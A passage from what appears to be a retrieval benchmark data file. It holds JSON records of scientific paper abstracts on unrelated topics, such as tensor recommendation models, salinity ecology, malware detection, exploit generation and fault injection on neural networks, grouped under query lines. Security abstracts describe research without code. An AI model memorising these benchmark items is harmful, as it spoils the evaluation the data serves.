"docid": "72e97d0f9f4ca19e4654e69b93729d71",
"text": "In this paper, we propose a novel cross-space affinity learning algorithm over different spaces with heterogeneous structures. Unlike most of affinity learning algorithms on the homogeneous space, we construct a cross-space tensor model to learn the affinity measures on heterogeneous spaces subject to a set of order constraints from the training pool. We further enhance the model with a factorization form which greatly reduces the number of parameters of the model with a controlled complexity. Moreover, from the practical perspective, we show the proposed factorized cross-space tensor model can be efficiently optimized by a series of simple quadratic optimization problems in an iterative manner. The proposed cross-space affinity learning algorithm can be applied to many real-world problems, which involve multiple heterogeneous data objects defined over different spaces. In this paper, we apply it into the recommendation system to measure the affinity between users and the product items, where a higher affinity means a higher rating of the user on the product. For an empirical evaluation, a widely used benchmark movie recommendation data set-MovieLens-is used to compare the proposed algorithm with other state-of-the-art recommendation algorithms and we show that very competitive results can be obtained.",
"title": ""
},
{
"docid": "a8122b8139b88ad5bff074d527b76272",
"text": "Salt is a natural component of the Australian landscape to which a number of biota inhabiting rivers and wetlands are adapted. Under natural flow conditions periods of low flow have resulted in the concentration of salts in wetlands and riverine pools. The organisms of these systems survive these salinities by tolerance or avoidance. Freshwater ecosystems in Australia are now becoming increasingly threatened by salinity because of rising saline groundwater and modification of the water regime reducing the frequency of high-flow (flushing) events, resulting in an accumulation of salt. Available data suggest that aquatic biota will be adversely affected as salinity exceeds 1000 mg L (1500 EC) but there is limited information on how increasing salinity will affect the various life stages of the biota. Salinisation can lead to changes in the physical environment that will affect ecosystem processes. However, we know little about how salinity interacts with the way nutrients and carbon are processed within an ecosystem. This paper updates the knowledge base on how salinity affects the physical and biotic components of aquatic ecosystems and explores the needs for information on how structure and function of aquatic ecosystems change with increasing salinity. BT0215 Ef ect of s al ini ty on f r eshwat er ecosys t em s in A us t rali a D. L. Niel e etal",
"title": ""
},
{
"docid": "e3f847a7c815772b909fcccbafed4af3",
"text": "The contribution of tumorigenic stem cells to haematopoietic cancers has been established for some time, and cells possessing stem-cell properties have been described in several solid tumours. Although chemotherapy kills most cells in a tumour, it is believed to leave tumour stem cells behind, which might be an important mechanism of resistance. For example, the ATP-binding cassette (ABC) drug transporters have been shown to protect cancer stem cells from chemotherapeutic agents. Gaining a better insight into the mechanisms of stem-cell resistance to chemotherapy might therefore lead to new therapeutic targets and better anticancer strategies.",
"title": ""
},
{
"docid": "e688dea8ba92a92f4d459c8c33f313e1",
"text": "Since the first description of Seasonal Affective Disorder (SAD) by Rosenthal et al. in the 1980s, treatment with daily administration of light, or Bright Light Therapy (BLT), has been proven effective and is now recognized as a first-line therapeutic modality. More recently, studies aimed at understanding the pathophysiology of SAD and the mechanism of action of BLT have implicated shifts in the circadian rhythm and alterations in serotonin reuptake. BLT has also been increasingly used as an experimental treatment in non-seasonal unipolar and bipolar depression and other psychiatric disorders with known or suspected alterations in the circadian system. This review will discuss the history of SAD and BLT, the proposed pathophysiology of SAD and mechanisms of action of BLT in the treatment of SAD, and evidence supporting the efficacy of BLT in the treatment of non-seasonal unipolar major depression, bipolar depression, eating disorders, and ADHD.",
"title": ""
},
{
"docid": "7bd091ed5539b90e5864308895b0d5d4",
"text": "We discuss the design of a high-performance field programmable gate array (FPGA) architecture that efficiently prototypes asynchronous (clockless) logic. In this FPGA architecture, low-level application logic is described using asynchronous dataflow functions that obey a token-based compute model. We implement these dataflow functions using finely pipelined asynchronous circuits that achieve high computation rates. This asynchronous dataflow FPGA architecture maintains most of the performance benefits of a custom asynchronous design, while also providing postfabrication logic reconfigurability. We report results for two asynchronous dataflow FPGA designs that operate at up to 400 MHz in a typical TSMC 0.25 /spl mu/m CMOS process.",
"title": ""
},
{
"docid": "16eaf32d33fc0781ea1a0bf9fde2a671",
"text": "As service chaining matures, interoperability is a must. Network service headers provide the required data-plane information needed to construct topologically independent service paths as well as to pass opaque metadata between classification and service functions.",
"title": ""
},
{
"docid": "0153f2fbf53c3919e22f08a60c5c6d5b",
"text": "Data mining aims at extracting knowledge from data. Information rich datasets, such as EBSCOhost Newspaper Source [3], carry a significant amount of multi-typed current and archived news data. This extracted information can easily be constructed into a heterogeneous information network. Through use of many mining techniques, deeper comprehension can then be unearthed from the underlying relationships between article, authors, tags, etc. This paper focuses on building on two such techniques, classification and embedding. GNetMine [1] is a common classification algorithm that is able to label entities of different types through a small set of training data. Node2Vec [5] is an embedding approach, using the many nodes and edges in a heterogeneous network, and converting them into a lowdimensional vector space, that can quickly and easily allow for comparison between nodes of any type. The goal of this paper is to combine these methods and compare and contrast the quality of output of Node2Vec with unlabeled data, directly from the heterogeneous network of EBSCOhost sports news data, as well as adding learned classification labels. Can nodes labeled using classification as an input to network embedding, improve the outcome of the embedding results?",
"title": ""
},
{
"docid": "2876086e4431e8607d5146f14f0c29dc",
"text": "Vascular ultrasonography has an important role in the diagnosis and management of venous disease. The venous system, however, is more complex and variable compared to the arterial system due to its frequent anatomical variations. This often becomes quite challenging for sonographers. This paper discusses the anatomy of the long saphenous vein and its anatomical variations accompanied by sonograms and illustrations.",
"title": ""
},
{
"docid": "b3b4e93b48914aa5844beae27a8af2b2",
"text": "http://ebmh.bmj.com/content/13/2/35.full.html Updated information and services can be found at: These include: References http://ebmh.bmj.com/content/13/2/35.full.html#ref-list-1 This article cites 30 articles, 9 of which can be accessed free at: service Email alerting box at the top right corner of the online article. Receive free email alerts when new articles cite this article. Sign up in the Notes",
"title": ""
},
{
"docid": "a926341e8b663de6c412b8e3a61ee171",
"text": "— Studies within the EHEA framework include the acquisition of skills such as the ability to learn autonomously, which requires students to devote much of their time to individual and group work to reinforce and further complement the knowledge acquired in the classroom. In order to consolidate the results obtained from classroom activities, lecturers must develop tools to encourage learning and facilitate the process of independent learning. The aim of this work is to present the use of virtual laboratories based on Easy Java Simulations to assist in the understanding and testing of electrical machines. con los usuarios integrándose fácilmente en plataformas de e-aprendizaje. Para nuestra aplicación hemos escogido el Java Ejs (Easy Java Simulations), ya que es una herramienta de software gratuita, diseñada para el desarrollo de laboratorios virtuales interactivos, dispone de elementos visuales parametrizables",
"title": ""
},
{
"docid": "edf52710738647f7ebd4c017ddf56c2c",
"text": "Tasks like search-and-rescue and urban reconnaissance benefit from large numbers of robots working together, but high levels of autonomy are needed in order to reduce operator requirements to practical levels. Reducing the reliance of such systems on human operators presents a number of technical challenges including automatic task allocation, global state and map estimation, robot perception, path planning, communications, and human-robot interfaces. This paper describes our 14-robot team, designed to perform urban reconnaissance missions, that won the MAGIC 2010 competition. This paper describes a variety of autonomous systems which require minimal human effort to control a large number of autonomously exploring robots. Maintaining a consistent global map, essential for autonomous planning and for giving humans situational awareness, required the development of fast loop-closing, map optimization, and communications algorithms. Key to our approach was a decoupled centralized planning architecture that allowed individual robots to execute tasks myopically, but whose behavior was coordinated centrally. In this paper, we will describe technical contributions throughout our system that played a significant role in the performance of our system. We will also present results from our system both from the competition and from subsequent quantitative evaluations, pointing out areas in which the system performed well and where interesting research problems remain.",
"title": ""
},
{
"docid": "6fad371eecbb734c1e54b8fb9ae218c4",
"text": "Quantitative Susceptibility Mapping (QSM) is a novel MRI based technique that relies on estimates of the magnetic field distribution in the tissue under examination. Several sophisticated data processing steps are required to extract the magnetic field distribution from raw MRI phase measurements. The objective of this review article is to provide a general overview and to discuss several underlying assumptions and limitations of the pre-processing steps that need to be applied to MRI phase data before the final field-to-source inversion can be performed. Beginning with the fundamental relation between MRI signal and tissue magnetic susceptibility this review covers the reconstruction of magnetic field maps from multi-channel phase images, background field correction, and provides an overview of state of the art QSM solution strategies.",
"title": ""
},
{
"docid": "e47574d102d581f3bc4a8b4ea304d216",
"text": "The paper proposes a high torque density design for variable flux machines with Alnico magnets. The proposed design uses tangentially magnetized magnets in order to achieve high air gap flux density and to avoid demagnetization by the armature field. Barriers are also inserted in the rotor to limit the armature flux and to allow the machine to utilize both reluctance and magnet torque components. An analytical procedure is first applied to obtain the initial machine design parameters. Then several modifications are applied to the stator and rotor designs through finite element simulations (FEA) in order to improve the machine efficiency and torque density.",
"title": ""
},
{
"docid": "98df036ec06b4a1de727e1c0dd87993d",
"text": "Coccidiosis is the bane of the poultry industry causing considerable economic loss. Eimeria species are known as protozoan parasites to cause morbidity and death in poultry. In addition to anticoccidial chemicals and vaccines, natural products are emerging as an alternative and complementary way to control avian coccidiosis. In this review, we update recent advances in the use of anticoccidial phytoextracts and phytocompounds, which cover 32 plants and 40 phytocompounds, following a database search in PubMed, Web of Science, and Google Scholar. Four plant products commercially available for coccidiosis are included and discussed. We also highlight the chemical and biological properties of the plants and compounds as related to coccidiosis control. Emphasis is placed on the modes of action of the anticoccidial plants and compounds such as interference with the life cycle of Eimeria, regulation of host immunity to Eimeria, growth regulation of gut bacteria, and/or multiple mechanisms. Biological actions, mechanisms, and prophylactic/therapeutic potential of the compounds and extracts of plant origin in coccidiosis are summarized and discussed.",
"title": ""
},
{
"docid": "f5d769be1305755fe0753d1e22cbf5c9",
"text": "The number of malware is increasing rapidly and a lot of malware use stealth techniques such as encryption to evade pattern matching detection by anti-virus software. To resolve the problem, behavior based detection method which focuses on malicious behaviors of malware have been researched. Although they can detect unknown and encrypted malware, they suffer a serious problem of false positives against benign programs. For example, creating files and executing them are common behaviors performed by malware, however, they are also likely performed by benign programs thus it causes false positives. In this paper, we propose a malware detection method based on evaluation of suspicious process behaviors on Windows OS. To avoid false positives, our proposal focuses on not only malware specific behaviors but also normal behavior that malware would usually not do. Moreover, we implement a prototype of our proposal to effectively analyze behaviors of programs. Our evaluation experiments using our malware and benign program datasets show that our malware detection rate is about 60% and it does not cause any false positives. Furthermore, we compare our proposal with completely behavior-based anti-virus software. Our results show that our proposal puts few burdens on users and reduces false positives.",
"title": ""
},
{
"docid": "4be5499f5aa6668c883162a9e6be0af9",
"text": "Mindfulness is increasingly being used for weight management. However, the strength of the evidence for such an approach is unclear; although mindfulness-based weight management programs have had some success, it is difficult to conclude that the mindfulness components were responsible. Research in this area is further complicated by the fact that the term 'mindfulness' is used to refer to a range of different practices. Additionally, we have little understanding of the mechanisms by which mindfulness might exert its effects. This review addresses these issues by examining research that has looked at the independent effects of mindfulness and mindfulness-related strategies on weight loss and weight management related eating behaviors. As well as looking at evidence for effects, the review also considers whether effects may vary with different types of strategy, and the kinds of mechanisms that may be responsible for any change. It is concluded that there is some evidence to support the effects of (a) present moment awareness, when applied to the sensory properties of food, and (b) decentering. However, research in these areas has yet to be examined in a controlled manner in relation to weight management.",
"title": ""
},
{
"docid": "4ee789cc3991783b8850ca8730f67656",
"text": "This paper investigates the use of data warehouse and business intelligence capabilities to integrate with customers in the supply chain and improve insights into customer sales. By making that same data warehouse sales information available to customers, this paper explores how the data warehouse can provide additional value to those customers, eliminating asymmetries of information in the supply chain. In addition, this paper investigates the evolution of data warehousing into business intelligence, expanding sales information to include marketing associate performance analysis generated for internal use. Further, this paper also examines a methodology that was used for building a business intelligence system. Finally, this paper investigates what appears to be a business intelligence driven focus on enterprise resource planning systems. These issues are illustrated using real world data warehousing and business intelligence artifacts developed at SYSCO.",
"title": ""
},
{
"docid": "65415effb35f9c8234f81fdef2916f42",
"text": "The scanpath comparison framework based on string editing is revisited. The previous method of clustering based on k-means \"preevaluation\" is replaced by the mean shift algorithm followed by elliptical modeling via Principal Components Analysis. Ellipse intersection determines cluster overlap, with fast nearest-neighbor search provided by the kd-tree. Subsequent construction of Y - matrices and parsing diagrams is fully automated, obviating prior interactive steps. Empirical validation is performed via analysis of eye movements collected during a variant of the Trail Making Test, where participants were asked to visually connect alphanumeric targets (letters and numbers). The observed repetitive position similarity index matches previously published results, providing ongoing support for the scanpath theory (at least in this situation). Task dependence of eye movements may be indicated by the global position index, which differs considerably from past results based on free viewing.",
"title": ""
},
{
"docid": "4e8fcf379ad69e6f70c11c60ebba1f0d",
"text": "In this paper, we introduce a transparent fingerprint sensing system using a thin film transistor (TFT) sensor panel, based on a self-capacitive sensing scheme. An armorphousindium gallium zinc oxide (a-IGZO) TFT sensor array and associated custom Read-Out IC (ROIC) are implemented for the system. The sensor panel has a 200 × 200 pixel array and each pixel size is as small as 50 μm × 50 μm. The ROIC uses only eight analog front-end (AFE) amplifier stages along with a successive approximation analog-to-digital converter (SAR ADC). To get the fingerprint image data from the sensor array, the ROIC senses a capacitance, which is formed by a cover glass material between a human finger and an electrode of each pixel of the sensor array. Three methods are reviewed for estimating the self-capacitance. The measurement result demonstrates that the transparent fingerprint sensor system has an ability to differentiate a human finger's ridges and valleys through the fingerprint sensor array.",
"title": ""
}
] | scidocsrr |
34763dedcdd145f20c66b07080b5f03d | Wiederverwendbarkeit von Programmieraufgaben durch Interoperabilität von Programmierlernsystemen | [
{
"docid": "4592c8f5758ccf20430dbec02644c931",
"text": "Taylor & Francis makes every effort to ensure the accuracy of all the information (the “Content”) contained in the publications on our platform. However, Taylor & Francis, our agents, and our licensors make no representations or warranties whatsoever as to the accuracy, completeness, or suitability for any purpose of the Content. Any opinions and views expressed in this publication are the opinions and views of the authors, and are not the views of or endorsed by Taylor & Francis. The accuracy of the Content should not be relied upon and should be independently verified with primary sources of information. Taylor and Francis shall not be liable for any losses, actions, claims, proceedings, demands, costs, expenses, damages, and other liabilities whatsoever or howsoever caused arising directly or indirectly in connection with, in relation to or arising out of the use of the Content.",
"title": ""
}
] | [
{
"docid": "3ccc5fd5bbf570a361b40afca37cec92",
"text": "Face detection techniques have been developed for decades, and one of remaining open challenges is detecting small faces in unconstrained conditions. The reason is that tiny faces are often lacking detailed information and blurring. In this paper, we proposed an algorithm to directly generate a clear high-resolution face from a blurry small one by adopting a generative adversarial network (GAN). Toward this end, the basic GAN formulation achieves it by super-resolving and refining sequentially (e.g. SR-GAN and cycle-GAN). However, we design a novel network to address the problem of super-resolving and refining jointly. We also introduce new training losses to guide the generator network to recover fine details and to promote the discriminator network to distinguish real vs. fake and face vs. non-face simultaneously. Extensive experiments on the challenging dataset WIDER FACE demonstrate the effectiveness of our proposed method in restoring a clear high-resolution face from a blurry small one, and show that the detection performance outperforms other state-of-the-art methods.",
"title": ""
},
{
"docid": "4d0921d8dd1004f0eed02df0ff95a092",
"text": "The “open classroom” emerged as a reaction against the industrial-era enclosed and authoritarian classroom. Although contemporary school architecture continues to incorporate and express ideas of openness, more research is needed about how teachers adapt to new and different built contexts. Our purpose is to identify teacher reaction to the affordances of open space learning environments. We outline a case study of teacher perceptions of working in new open plan school buildings. The case study demonstrates that affordances of open space classrooms include flexibility, visibility and scrutiny, and a de-emphasis of authority; teacher reactions included collective practice, team orientation, and increased interactions and a democratisation of authority. We argue that teacher reaction to the new open classroom features adaptability, intensification of day-to-day practice, and intraand inter-personal knowledge and skills.",
"title": ""
},
{
"docid": "cb85ae05ec32f40211d255f3452a6be1",
"text": "This paper presents a forward converter topology that employs a small resonant auxiliary circuit. The advantages of the proposed topology include soft switching in both the main and auxiliary switches, recovery of the leakage inductance energy, simplified power transformer achieving self-reset without using the conventional reset winding, simple gate drive and control circuit, etc. Steady-state analysis is performed herein, and a design procedure is presented for general applications. A 35–75-Vdc to 5 Vdc 100-W prototype converter switched at a frequency of 200 kHz is built to verify the design, and 90% overall efficiency has been obtained experimentally at full load.",
"title": ""
},
{
"docid": "18425da2e29b08565dde1459d11f6141",
"text": "Data flow is a natural paradigm for describing DSP applications for concurrent implementation on parallel hardware. Data flow programs for signal processing are directed graphs where each node represents a function and each arc represents a signal path. Synchronous data flow (SDF) is a special case of data flow (either atomic or large grain) in which the number of data samples produced or consumed by each node on each invocation is specified a priori. Nodes can be scheduled statically (at compile time) onto single or parallel programmable processors so the run-time overhead usually associated with data flow evaporates. Multiple sample rates within the same system are easily and naturally handled. Conditions for correctness of SDF graph are explained and scheduling algorithms are described for homogeneous parallel processors sharing memory. A preliminary SDF software system for automatically generating assembly language code for DSP microcomputers is described. Two new efficiency techniques are introduced, static buffering and an extension to SDF to efficiently implement conditionals.",
"title": ""
},
{
"docid": "7b2167017ca1ab1c535d4df33457f368",
"text": "We present a method for simulating quasistatic crack propagation in 2-D which combines the extended finite element method (XFEM) with a general algorithm for cutting triangulated domains, and introduce a simple yet general and flexible quadrature rule based on the same geometric algorithm. The combination of these methods gives several advantages. First, the cutting algorithm provides a flexible and systematic way of determining material connectivity, which is required by the XFEM enrichment functions. Also, our integration scheme is straightfoward to implement and accurate, without requiring a triangulation that incorporates the new crack edges or the addition of new degrees of freedom to the system. The use of this cutting algorithm and integration rule allows for geometrically complicated domains and complex crack patterns. Copyright c © 2009 John Wiley & Sons, Ltd.",
"title": ""
},
{
"docid": "96c14e4c9082920edb835e85ce99dc21",
"text": "When filling out privacy-related forms in public places such as hospitals or clinics, people usually are not aware that the sound of their handwriting leaks personal information. In this paper, we explore the possibility of eavesdropping on handwriting via nearby mobile devices based on audio signal processing and machine learning. By presenting a proof-of-concept system, WritingHacker, we show the usage of mobile devices to collect the sound of victims' handwriting, and to extract handwriting-specific features for machine learning based analysis. WritingHacker focuses on the situation where the victim's handwriting follows certain print style. An attacker can keep a mobile device, such as a common smart-phone, touching the desk used by the victim to record the audio signals of handwriting. Then the system can provide a word-level estimate for the content of the handwriting. To reduce the impacts of various writing habits and writing locations, the system utilizes the methods of letter clustering and dictionary filtering. Our prototype system's experimental results show that the accuracy of word recognition reaches around 50% - 60% under certain conditions, which reveals the danger of privacy leakage through the sound of handwriting.",
"title": ""
},
{
"docid": "aa25ab7078969c54d84aa7e4b2650f9e",
"text": "Informative art is computer augmented, or amplified, works of art that not only are aesthetical objects but also information displays, in as much as they dynamically reflect information about their environment. Informative art can be seen as a kind of slow technology, i.e. a technology that promotes moments of concentration and reflection. Our aim is to present the design space of informative art. We do so by discussing its properties and possibilities in relation to work on information visualisation, novel information display strategies, as well as art. A number of examples based on different kinds of mapping relations between information and the properties of the composition of an artwork are described.",
"title": ""
},
{
"docid": "d9710b9a214d95c572bdc34e1fe439c4",
"text": "This paper presents a new method, capable of automatically generating attacks on binary programs from software crashes. We analyze software crashes with a symbolic failure model by performing concolic executions following the failure directed paths, using a whole system environment model and concrete address mapped symbolic memory in S2 E. We propose a new selective symbolic input method and lazy evaluation on pseudo symbolic variables to handle symbolic pointers and speed up the process. This is an end-to-end approach able to create exploits from crash inputs or existing exploits for various applications, including most of the existing benchmark programs, and several large scale applications, such as a word processor (Microsoft office word), a media player (mpalyer), an archiver (unrar), or a pdf reader (foxit). We can deal with vulnerability types including stack and heap overflows, format string, and the use of uninitialized variables. Notably, these applications have become software fuzz testing targets, but still require a manual process with security knowledge to produce mitigation-hardened exploits. Using this method to generate exploits is an automated process for software failures without source code. The proposed method is simpler, more general, faster, and can be scaled to larger programs than existing systems. We produce the exploits within one minute for most of the benchmark programs, including mplayer. We also transform existing exploits of Microsoft office word into new exploits within four minutes. The best speedup is 7,211 times faster than the initial attempt. For heap overflow vulnerability, we can automatically exploit the unlink() macro of glibc, which formerly requires sophisticated hacking efforts.",
"title": ""
},
{
"docid": "de9c4e83639f399fe8b11af450b86283",
"text": "This paper deals with sentence-level sentiment classification. Though a variety of neural network models have been proposed recently, however, previous models either depend on expensive phrase-level annotation, most of which has remarkably degraded performance when trained with only sentence-level annotation; or do not fully employ linguistic resources (e.g., sentiment lexicons, negation words, intensity words). In this paper, we propose simple models trained with sentence-level annotation, but also attempt to model the linguistic role of sentiment lexicons, negation words, and intensity words. Results show that our models are able to capture the linguistic role of sentiment words, negation words, and intensity words in sentiment expression.",
"title": ""
},
{
"docid": "8acb81776a84e7037fcd72a991a6febf",
"text": "This letter presents a new filtering scheme based on contrast enhancement within the filtering window for removing the random valued impulse noise. The application of a nonlinear function for increasing the difference between a noise-free and noisy pixels results in efficient detection of noisy pixels. As the performance of a filtering system, in general, depends on the number of iterations used, an effective stopping criterion based on noisy image characteristics to determine the number of iterations is also proposed. Extensive simulation results exhibit that the proposed method significantly outperforms many other well-known techniques.",
"title": ""
},
{
"docid": "74fd30bb5ef306968dcf05e5ea32c9d6",
"text": "Depth of field is the swath through a 3D scene that is imaged in acceptable focus through an optics system, such as a camera lens. Control over depth of field is an important artistic tool that can be used to emphasize the subject of a photograph. In a real camera, the control over depth of field is limited by the laws of physics and by physical constraints. The depth of field effect has been simulated in computer graphics, but with the same limited control as found in real camera lenses. In this report, we use anisotropic diffusion to generalize depth of field in computer graphics by allowing the user to independently specify the degree of blur at each point in three-dimensional space. Generalized depth of field provides a novel tool to emphasize an area of interest within a 3D scene, to pick objects out of a crowd, and to render a busy, complex picture more understandable by focusing only on relevant details that may be scattered throughout the scene. Our algorithm operates by blurring a sequence of nonplanar layers that form the scene. Choosing a suitable blur algorithm for the layers is critical; thus, we develop appropriate blur semantics such that the blur algorithm will properly generalize depth of field. We found that anisotropic diffusion is the process that best suits these semantics.",
"title": ""
},
{
"docid": "5d679f76b7e5058d234a125ec48e7ea9",
"text": "Road traffic accidents are a major public health concern, resulting in an estimated 1.2 million deaths and 50 million injuries worldwide each year. In the developing world, road traffic accidents are among the leading cause of death and injury. The objective of this study is to evaluate a set of variable that contribute to the degree of accident severity in traffic crashes. The issue of traffic safety has raised great concerns across the sustainable development of modern traffic and transportation. The study on road traffic accident cause can identify the key factors rapidly, efficiently and provide instructional methods to the traffic accident prevention and road traffic accident reduction, which could greatly reduce personal casualty by road traffic accidents. Using the methods of traffic data analysis, can improve the road traffic safety management level effectively.",
"title": ""
},
{
"docid": "fbf30d2032b0695b5ab2d65db2fe8cbc",
"text": "Artificial Intelligence for computer games is an interesting topic which attracts intensive attention recently. In this context, Mario AI Competition modifies a Super Mario Bros game to be a benchmark software for people who program AI controller to direct Mario and make him overcome the different levels. This competition was handled in the IEEE Games Innovation Conference and the IEEE Symposium on Computational Intelligence and Games since 2009. In this paper, we study the application of Reinforcement Learning to construct a Mario AI controller that learns from the complex game environment. We train the controller to grow stronger for dealing with several difficulties and types of levels. In controller developing phase, we design the states and actions cautiously to reduce the search space, and make Reinforcement Learning suitable for the requirement of online learning.",
"title": ""
},
{
"docid": "fc1c3291c631562a6d1b34d5b5ccd27e",
"text": "There are many methods for making a multicast protocol “reliable.” At one end of the spectrum, a reliable multicast protocol might offer tomicity guarantees, such as all-or-nothing delivery, delivery ordering, and perhaps additional properties such as virtually synchronous addressing. At the other are protocols that use local repair to overcome transient packet loss in the network, offering “best effort” reliability. Yet none of this prior work has treated stability of multicast delivery as a basic reliability property, such as might be needed in an internet radio, television, or conferencing application. This article looks at reliability with a new goal: development of a multicast protocol which is reliable in a sense that can be rigorously quantified and includes throughput stability guarantees. We characterize this new protocol as a “bimodal multicast” in reference to its reliability model, which corresponds to a family of bimodal probability distributions. Here, we introduce the protocol, provide a theoretical analysis of its behavior, review experimental results, and discuss some candidate applications. These confirm that bimodal multicast is reliable, scalable, and that the protocol provides remarkably stable delivery throughput.",
"title": ""
},
{
"docid": "3573fb077b151af3c83f7cd6a421dc9c",
"text": "Let G = (V, E) be a directed graph with a distinguished source vertex s. The single-source path expression problem is to find, for each vertex v, a regular expression P(s, v) which represents the set of all paths in G from s to v A solution to this problem can be used to solve shortest path problems, solve sparse systems of linear equations, and carry out global flow analysis. A method is described for computing path expressions by dwidmg G mto components, computing path expressions on the components by Gaussian elimination, and combining the solutions This method requires O(ma(m, n)) time on a reducible flow graph, where n Is the number of vertices m G, m is the number of edges in G, and a is a functional inverse of Ackermann's function The method makes use of an algonthm for evaluating functions defined on paths in trees. A smapllfied version of the algorithm, which runs in O(m log n) time on reducible flow graphs, is quite easy to implement and efficient m practice",
"title": ""
},
{
"docid": "7bbe2345cfc5437d15f5db8c24205a10",
"text": "Studying the bursty nature of cascades in social media is practically important in many applications such as product sales prediction, disaster relief, and stock market prediction. Although the cascade volume prediction has been extensively studied, how to predict when a burst will come remains an open problem. It is challenging to predict the time of the burst due to the “quick rise and fall” pattern and the diverse time spans of the cascades. To this end, this paper proposes a classification based approach for burst time prediction by utilizing and modeling rich knowledge in information diffusion. Particularly, we first propose a time window based approach to predict in which time window the burst will appear. This paves the way to transform the time prediction task to a classification problem. To address the challenge that the original time series data of the cascade popularity only are not sufficient for predicting cascades with diverse magnitudes and time spans, we explore rich information diffusion related knowledge and model them in a scale-independent manner. Extensive experiments on a Sina Weibo reposting dataset demonstrate the superior performance of the proposed approach in accurately predicting the burst time of posts.",
"title": ""
},
{
"docid": "5c3b5f415c2789a01e0314487c281dee",
"text": "In this paper we propose two algorithms for numerical fractional integration and Caputo fractional differentiation. We present a modification of trapezoidal rule that is used to approximate finite integrals, the new modification extends the application of the rule to approximate integrals of arbitrary order a > 0. We then, using the new modification derive an algorithm to approximate fractional derivatives of arbitrary order a > 0, where the fractional derivative based on Caputo definition, for a given function by a weighted sum of function and its ordinary derivatives values at specified points. The study is conducted through illustrative examples and error analysis. 2005 Elsevier Inc. All rights reserved.",
"title": ""
},
{
"docid": "fba60a0dafd02886bd05c307a14da93b",
"text": "Deep neural network (DNN), being able to effectively learn from a training set and provide highly accurate classification results, has become the de-facto technique used in many mission-critical systems. The security of DNN itself is therefore of great concern. In this paper, we investigate the impact of fault injection attacks on DNN, wherein attackers try to misclassify a specified input pattern into an adversarial class by modifying the parameters used in DNN via fault injection. We propose two kinds of fault injection attacks to achieve this objective. Without considering stealthiness of the attack, single bias attack (SBA) only requires to modify one parameter in DNN for misclassification, based on the observation that the outputs of DNN may linearly depend on some parameters. Gradient descent attack (GDA) takes stealthiness into consideration. By controlling the amount of modification to DNN parameters, GDA is able to minimize the fault injection impact on input patterns other than the specified one. Experimental results demonstrate the effectiveness and efficiency of the proposed attacks.",
"title": ""
},
{
"docid": "e658507a3ed6c52d27c5db618f9fa8cb",
"text": "Accident prediction is one of the most critical aspects of road safety, whereby an accident can be predicted before it actually occurs and precautionary measures taken to avoid it. For this purpose, accident prediction models are popular in road safety analysis. Artificial intelligence (AI) is used in many real world applications, especially where outcomes and data are not same all the time and are influenced by occurrence of random changes. This paper presents a study on the existing approaches for the detection of unsafe driving patterns of a vehicle used to predict accidents. The literature covered in this paper is from the past 10 years, from 2004 to 2014. AI techniques are surveyed for the detection of unsafe driving style and crash prediction. A number of statistical methods which are used to predict the accidents by using different vehicle and driving features are also covered in this paper. The approaches studied in this paper are compared in terms of datasets and prediction performance. We also provide a list of datasets and simulators available for the scientific community to conduct research in the subject domain. The paper also identifies some of the critical open questions that need to be addressed for road safety using AI techniques.",
"title": ""
},
{
"docid": "d516a59094e3197bce709f4414db4517",
"text": "Authorship attribution deals with identifying the authors of anonymous texts. Traditionally, research in this field has focused on formal texts, such as essays and novels, but recently more attention has been given to texts generated by on-line users, such as e-mails and blogs. Authorship attribution of such on-line texts is a more challenging task than traditional authorship attribution, because such texts tend to be short, and the number of candidate authors is often larger than in traditional settings. We address this challenge by using topic models to obtain author representations. In addition to exploring novel ways of applying two popular topic models to this task, we test our new model that projects authors and documents to two disjoint topic spaces. Utilizing our model in authorship attribution yields state-of-the-art performance on several data sets, containing either formal texts written by a few authors or informal texts generated by tens to thousands of on-line users. We also present experimental results that demonstrate the applicability of topical author representations to two other problems: inferring the sentiment polarity of texts, and predicting the ratings that users would give to items such as movies.",
"title": ""
}
] | scidocsrr |
b0bd52eba641badd244bee42ea32e32b | Development and Validation of a Social Capital Questionnaire for Adolescent Students (SCQ-AS) | [
{
"docid": "c936e76e8db97b640a4123e66169d1b8",
"text": "Varying philosophical and theoretical orientations to qualitative inquiry remind us that issues of quality and credibility intersect with audience and intended research purposes. This overview examines ways of enhancing the quality and credibility of qualitative analysis by dealing with three distinct but related inquiry concerns: rigorous techniques and methods for gathering and analyzing qualitative data, including attention to validity, reliability, and triangulation; the credibility, competence, and perceived trustworthiness of the qualitative researcher; and the philosophical beliefs of evaluation users about such paradigm-based preferences as objectivity versus subjectivity, truth versus perspective, and generalizations versus extrapolations. Although this overview examines some general approaches to issues of credibility and data quality in qualitative analysis, it is important to acknowledge that particular philosophical underpinnings, specific paradigms, and special purposes for qualitative inquiry will typically include additional or substitute criteria for assuring and judging quality, validity, and credibility. Moreover, the context for these considerations has evolved. In early literature on evaluation methods the debate between qualitative and quantitative methodologists was often strident. In recent years the debate has softened. A consensus has gradually emerged that the important challenge is to match appropriately the methods to empirical questions and issues, and not to universally advocate any single methodological approach for all problems.",
"title": ""
}
] | [
{
"docid": "8e8dc6f3579cf4360118a4ce5550de7e",
"text": "In the Internet-age, malware poses a serious and evolving threat to security, making the detection of malware of utmost concern. Many research efforts have been conducted on intelligent malware detection by applying data mining and machine learning techniques. Though great results have been obtained with these methods, most of them are built on shallow learning architectures, which are still somewhat unsatisfying for malware detection problems. In this paper, based on the Windows Application Programming Interface (API) calls extracted from the Portable Executable (PE) files, we study how a deep learning architecture using the stacked AutoEncoders (SAEs) model can be designed for intelligent malware detection. The SAEs model performs as a greedy layerwise training operation for unsupervised feature learning, followed by supervised parameter fine-tuning (e.g., weights and offset vectors). To the best of our knowledge, this is the first work that deep learning using the SAEs model based on Windows API calls is investigated in malware detection for real industrial application. A comprehensive experimental study on a real and large sample collection from Comodo Cloud Security Center is performed to compare various malware detection approaches. Promising experimental results demonstrate that our proposed method can further improve the overall performance in malware detection compared with traditional shallow learning methods.",
"title": ""
},
{
"docid": "59b8ee881f8d458ee3d5a42ef2db662f",
